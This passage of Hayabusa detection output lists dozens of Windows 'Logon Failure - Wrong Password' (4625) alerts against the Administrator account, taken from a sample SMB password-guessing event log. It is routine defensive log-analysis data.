NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTLdNb0XbzXuLi51 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSjDYb1BhHC9UTxO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1yLH19VsfLx9BGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4AVhjdz9yHsfss0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqWLOKaKwS8VBxDj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: EjK8A8DTSYursBzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaDCKPslwRaLBWtH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAvoekviFDSAIgBe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3XOmFwh8IamESWCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 54GbW769j1x27mrI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bZSkhwZXc1SSknDT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 05AuqlN44x7oJGoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ4A6ReTVTcFCFeN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T7U6i4CMrL0bHouf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaeA4uZ6o8BRbzwf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MEnlL5BHmlCrtk7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNMpwAAaTsyzPfR | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oBtHQkRWIoq5hfn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5pkk9lgqMQ4wxQel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQVan7kRDOlnim50 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9282GqsC7UiUMbRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3lj7GjYryW9wjGgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: MPy4iUy5WBSLUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kvD9DEuos8SRrLH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NH1EnMG6fTvcz4QR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqHDXSQn8gkl2LJy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWI9XDDHjs2xcNB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zo53mEz6nal5Gxff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtOgC6wqMoNYVxId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdadoJYvD7DYjlSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U1xjdqjT9h0KUqG2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfkzZBvO4onYx6JZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JqY8CvyODDLQV9Ps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPMRIxRVuh13jmZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jARkTWdKTfTIwlug | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zwhkc71Nfn7QDf7c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qsYad9PgEajlYqvo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9YPw0DsspVbrOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsHpLCOdAOPFM6nD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcNytOhGOZKaREL9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lc5boBVigHE1ccGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQXg4ZHdBYHyiTTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JebTJzyn91NrpvkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wCE5ypjEU5feEEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OglsROoqX48xm0gJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bNC9ES3l3KwXPxb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: byPavQuiscMm7CMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQESAC3XpxCJJfG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5aYRnzirSj0PNXAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8s9xJ659geFHOlY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yBQdyO0diiFixwlx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzULtccOFnLIRiVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pDEGzqTAyUab5P8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gomgb26W9qFacRr7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXOcDu88S5c5VwwV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WHRnzgQkfAhsUguj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0Q9ZIaRK43W9apv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2xvriGeIlDwtzS36 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pDYTFqeJC61Nneef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0LNR7xCHW9x2q2qc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AE4EBj8X5IfXO8ZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BEOSGw6TjZf9GWS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UCxe24uL4A6R9kgZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8v4DcIRkx43KCIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CY2buVupQ5oR1Cp5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f6c3MlpMEzkCVud2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2wV6op9AU4paDXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNn6aywSs67hVAO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wUa03SIX69WCIYbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zYi4TB42B2VQm5Tr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9mnUbGMnlrOR8Tv4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CJGMWqgmbXABdPvB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2W9BbDYgC6vhqU3o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6DYsaih1Yhb2uOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
